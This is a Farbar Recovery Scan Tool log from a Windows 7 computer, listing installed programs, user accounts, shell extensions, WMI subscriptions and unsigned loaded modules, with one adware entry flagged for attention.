2020-01-22 13:31 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\NDF
2020-01-21 17:06 - 2018-03-14 20:52 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-01-21 17:06 - 2018-02-13 09:42 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-01-21 17:06 - 2018-02-13 09:42 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-01-21 17:06 - 2018-02-13 09:42 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-01-21 17:06 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\system32\Macromed
2020-01-21 11:02 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Local\FileZilla
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\Program Files\FileZilla FTP Client
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\Program Files\Java
2020-01-20 20:31 - 2019-05-24 18:27 - 000129088 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2020-01-18 12:45 - 2018-01-23 15:41 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\XnView
2020-01-17 14:13 - 2018-01-12 21:25 - 000004608 _____ C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-01-16 15:00 - 2018-01-08 09:18 - 000000000 ____D C:\Program Files (x86)\AOMEI Partition Assistant Standard Edition 6.6
2020-01-16 13:58 - 2019-03-29 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Logishrd
2020-01-16 13:58 - 2018-02-21 21:47 - 000000000 ____D C:\Users\Jomko\AppData\Local\Deployment
2020-01-15 23:15 - 2009-07-14 05:45 - 000360416 _____ C:\Windows\system32\FNTCACHE.DAT
2020-01-15 21:45 - 2018-01-07 22:46 - 000000000 ____D C:\Windows\system32\MRT
2020-01-15 21:40 - 2018-01-07 22:46 - 120202352 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2020-01-08 00:08 - 2019-05-24 18:28 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\.minecraft
==================== Files in the root of some directories ========
2018-01-12 20:03 - 2018-01-12 20:03 - 000000437 _____ () C:\Users\Jomko\AppData\Roaming\ImageTuner.ini
2018-01-12 21:25 - 2020-01-17 14:13 - 000004608 _____ () C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-01-10 00:20 - 2018-01-10 00:20 - 000000001 _____ () C:\Users\Jomko\AppData\Local\llftool.4.40.agreement
2019-07-15 23:58 - 2019-07-15 23:58 - 000015468 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel
2019-07-11 06:58 - 2019-07-11 06:58 - 000012216 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel.NCNJ4Z
2018-03-22 16:27 - 2019-04-14 22:21 - 000007610 _____ () C:\Users\Jomko\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
LastRegBack: 2020-01-18 14:26
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-02-2020 02
Ran by Jomko (07-02-2020 20:56:59)
Running from C:\Users\Jomko\Desktop
Windows 7 Professional Service Pack 1 (X64) (2018-01-07 16:45:09)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1214245489-2610092731-2950206201-500 - Administrator - Disabled)
Guest (S-1-5-21-1214245489-2610092731-2950206201-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1214245489-2610092731-2950206201-1002 - Limited - Enabled)
Jomko (S-1-5-21-1214245489-2610092731-2950206201-1000 - Administrator - Enabled) => C:\Users\Jomko
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}) (Version: - Microsoft)
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0015-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0016-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0018-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0019-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001A-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001B-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0405-0000-0000000FF1CE}_PROPLUS_{3C3813E1-C370-4F32-9639-8B43C7C780CD}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0407-0000-0000000FF1CE}_PROPLUS_{2AB528A5-BB1B-4EBE-8E51-AD0C4CD33CA9}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0409-0000-0000000FF1CE}_PROPLUS_{3EC77D26-799B-4CD8-914F-C1565E796173}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-040E-0000-0000000FF1CE}_PROPLUS_{685D17E5-D868-4A77-B58E-255DEBA78262}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-041B-0000-0000000FF1CE}_PROPLUS_{F67648A4-713E-4298-BBAD-A83D8283B0F3}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_PROPLUS_{00C5525B-3CB3-467D-8100-2E6FB306CD86}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-041B-1000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0044-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-006E-041B-0000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Slovak (HKLM-x32\...\{AC76BA86-7AD7-1051-7B44-AC0F074E4100}) (Version: 19.021.20061 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.321 - Adobe)
Aktualizácie NVIDIA 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation)
ANT Drivers Installer x64 (HKLM\...\{C14C3A1D-B5B3-41BB-9358-6FEA3FC642AF}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AOMEI Partition Assistant Standard Edition 6.6 (HKLM-x32\...\{02F850ED-FD0E-4ED1-BE0B-54981f5BD3D4}_is1) (Version: - AOMEI Technology Co., Ltd.)
Apple Mobile Device Support (HKLM\...\{6CECF0FB-EE71-4FE5-8AE0-FA007408934A}) (Version: 13.0.0.38 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Ashampoo PDF Pro (HKLM-x32\...\{0A11EA01-9906-0D0E-7868-3381FE134510}_is1) (Version: 1.0.7 - Ashampoo GmbH & Co. KG)
Bitvise SSH Client - FlowSshNet (x64) (HKLM\...\{0F4F44AB-C022-466B-9836-8EB4344E481F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client - FlowSshNet (x86) (HKLM-x32\...\{F9932D09-05BF-4FB8-B748-094EC2B3FC1F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client 8.38 (remove only) (HKLM-x32\...\BvSshClient) (Version: 8.38 - Bitvise Limited)
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.96 - Meno vašej spoločnosti)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CloudNet (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Elevated Installer (HKLM-x32\...\{B11981DA-5AEA-459F-978A-F99541F77AD5}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
FileZilla Client 3.46.3 (HKLM-x32\...\FileZilla Client) (Version: 3.46.3 - Tim Kosse)
Free FLAC to MP3 Converter 1.4 (HKLM-x32\...\{A54C01BD-1277-4722-B42B-EC9800A90B1E}_is1) (Version: 1.4 - PolySoft Solutions)
Free ZIP Password Recovery (HKLM-x32\...\{AF4ED478-C15D-4D4D-95E4-70C15F963729}) (Version: 3.70.69 - KRyLack Software)
Garmin Express (HKLM-x32\...\{4cc2749e-1c2a-4f48-abdf-c17069bac4da}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{9BE7B09F-C8D2-4B1E-B83E-7387FDDA8BCD}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.130 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.441 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
Hard Disk Low Level Format Tool 4.40 (HKLM-x32\...\Hard Disk Low Level Format Tool_is1) (Version: - HDDGURU)
HP Dropbox Plugin (HKLM-x32\...\{9646F2DC-B09E-4314-92EC-B3332900A7EE}) (Version: 36.0.191.0 - HP)
HP EmailSMTP Plugin (HKLM-x32\...\{AF9F1F16-F6B4-4A66-B789-9F00B40B08AF}) (Version: 43.0.191.0 - HP)
HP FTP Plugin (HKLM-x32\...\{7DB5EDF6-8009-4E01-AF0D-4F3E02A0287F}) (Version: 43.0.191.0 - HP)
HP Google Drive Plugin (HKLM-x32\...\{07F30E12-A85F-4EA4-A5B3-3728FAB947ED}) (Version: 36.0.191.0 - HP)
HP LaserJet MFP M28-M31 Basic Device Software (HKLM\...\{08644094-D714-4B6E-9CEB-11433F5CBDB7}) (Version: 46.2.2636.18185 - HP Inc.)
HP LaserJet MFP M28-M31 Help (HKLM-x32\...\{0DF6621D-67C2-4E12-A5CF-260E985B8743}) (Version: 0.00.0005 - HP)
HP OneDrive Plugin (HKLM-x32\...\{8ED0A60F-9F44-4B7F-9C88-CC9E0B362628}) (Version: 36.0.191.0 - HP)
HP SFTP Plugin (HKLM-x32\...\{1F0191BF-E339-4192-85D9-C369CA3FE9F1}) (Version: 43.0.191.0 - HP)
HP SharePoint Plugin (HKLM-x32\...\{96DB7179-0B69-45E1-A109-3A3A1F5BBCDF}) (Version: 43.0.191.0 - HP)
I.R.I.S OCR (HKLM-x32\...\{3913CCF7-436B-4A7A-A265-62E9FFDD03D9}) (Version: 15.2.10.1114 - HP Inc.)
iCloud (HKLM\...\{28ABC5D7-AF47-4476-A6AA-C2DD822ED40F}) (Version: 7.9.0.9 - Apple Inc.)
ID3 Tag Editor (HKLM-x32\...\{671DC096-9262-4943-A3D8-ED8A757B60D5}_is1) (Version: - id3tageditor.com)
Inside (HKLM-x32\...\{9BD4503F-F711-491D-984A-AB4ABD66B8C2}_is1) (Version: - Playdead)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5067 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.0.0.102 - Intel Corporation)
Intel(R) Wireless Bluetooth(R) (HKLM\...\{00000070-0190-4FD1-8F3D-148929CC1385}) (Version: 19.70.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{6da487a6-c50d-494e-aaa0-6d8ce9c37ef3}) (Version: 20.10.2 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.42 - Irfan Skiljan)
iRoot (HKLM-x32\...\{1295E43F-382A-4CB2-9E0F-079C0D7401BB}_is1) (Version: 1.8.9.21144 - SING)
iTunes (HKLM\...\{8F087FFD-35AC-4707-8565-58E5619CBF18}) (Version: 12.10.0.7 - Apple Inc.)
Java 8 Update 241 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180241F0}) (Version: 8.0.2410.7 - Oracle Corporation)
JDownloader 2 (HKLM-x32\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kodi (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Kodi) (Version: - XBMC Foundation)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.10.84 - Logitech)
Master PDF Editor 3.6 (HKLM\...\Master PDF Editor 3_is1) (Version: 3.6.30 - Code Industry Ltd.)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\...\PROPLUS) (Version: 12.0.6215.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27012 (HKLM-x32\...\{427ada59-85e7-4bc8-b8d5-ebf59db60423}) (Version: 14.16.27012.6 - Microsoft Corporation)
Miro Video Converter (HKLM-x32\...\Miro Video Converter) (Version: 0.8.0 - Participatory Culture Foundation)
Mozilla Firefox 72.0.2 (x64 sk) (HKLM\...\Mozilla Firefox 72.0.2 (x64 sk)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.4 - Mozilla)
MPC-HC 1.7.13 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.13 - MPC-HC Team)
NeoDownloader 2.9.5 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.9.5 - Neowise Software)
NVIDIA Grafický ovládač 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 419.72 - NVIDIA Corporation)
NVIDIA Softvér systému s podporou technológie PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OpenOffice 4.1.5 (HKLM-x32\...\{E177AC33-EC9C-4537-8996-37ED331D9227}) (Version: 4.15.9789 - Apache Software Foundation)
Ovládací panel NVIDIA 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 419.72 - NVIDIA Corporation) Hidden
Podpora Apple aplikácií (32-bit) (HKLM-x32\...\{FD52A2FF-4D16-49C4-A2CD-DAC752C18BA2}) (Version: 8.0 - Apple Inc.)
Podpora Apple aplikácií(64-bit) (HKLM\...\{9B061D60-4E2C-4987-BFFD-423E3D477660}) (Version: 8.0 - Apple Inc.)
Product Improvement Study for HP LaserJet MFP M28-M31 (HKLM\...\{B50C256D-80E2-473E-9546-0410162F44D5}) (Version: 46.2.2636.18185 - HP Inc.)
PSPad editor (HKLM-x32\...\PSPad editor_is1) (Version: 4.6.2.2750 - Jan Fiala)
qTox (HKLM-x32\...\qTox) (Version: 1.13.0 - The qTox Project)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.1500.0 - SAMSUNG Electronics Co., Ltd.)
SoftEther VPN Client (HKLM\...\softether_sevpnclient) (Version: 4.29.9680 - SoftEther VPN Project)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.0 - Ghisler Software GmbH)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Win32DiskImager version 1.0.0 (HKLM-x32\...\{3DFFA293-DF2C-4B23-92E5-3433BDC310E1}}_is1) (Version: 1.0.0 - ImageWriter Developers)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 4.1 - Sysprogs)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
XnView 2.39 (HKLM-x32\...\XnView_is1) (Version: 2.39 - Gougelet Pierre-e)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{ED90173A-3B4C-4E7E-B9CF-79714425D4B5}\InprocServer32 -> C:\Program Files (x86)\PSPad editor\pspshellx64.dll () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2018-12-03] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1: [WinCDEmu] -> {D0E37FD2-F675-426F-B09A-2CF37BA46FD5} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers2: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers3: [FTShellContext] -> {AFF81F7B-6942-40c4-AADA-7214EF7B6DD1} => C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2019-07-12] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-03-18] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1_S-1-5-21-1214245489-2610092731-2950206201-1000: [EditWithPSPad] -> {ED90173A-3B4C-4E7E-B9CF-79714425D4B5} => C:\Program Files (x86)\PSPad editor\pspshellx64.dll [2014-11-02] () [File not signed]
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
==================== Loaded Modules (Whitelisted) =============
2018-01-08 18:39 - 2014-11-02 18:45 - 000029184 _____ () [File not signed] C:\Program Files (x86)\PSPad editor\pspshellx64.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000144896 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\libssh2.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000077824 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\zlib.dll
2011-09-16 14:52 - 2011-09-16 14:52 - 000053920 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthCopyHook.dll
2011-09-16 14:53 - 2011-09-16 14:53 - 000020128 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\athr_debug.dll
2011-09-16 14:54 - 2011-09-16 14:54 - 000040608 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BPP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000045216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BTBIP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000161440 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000504480 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\filetransfer.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000092832 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\gatts.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000106144 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\GOEP.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000080032 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Handsfree.dll
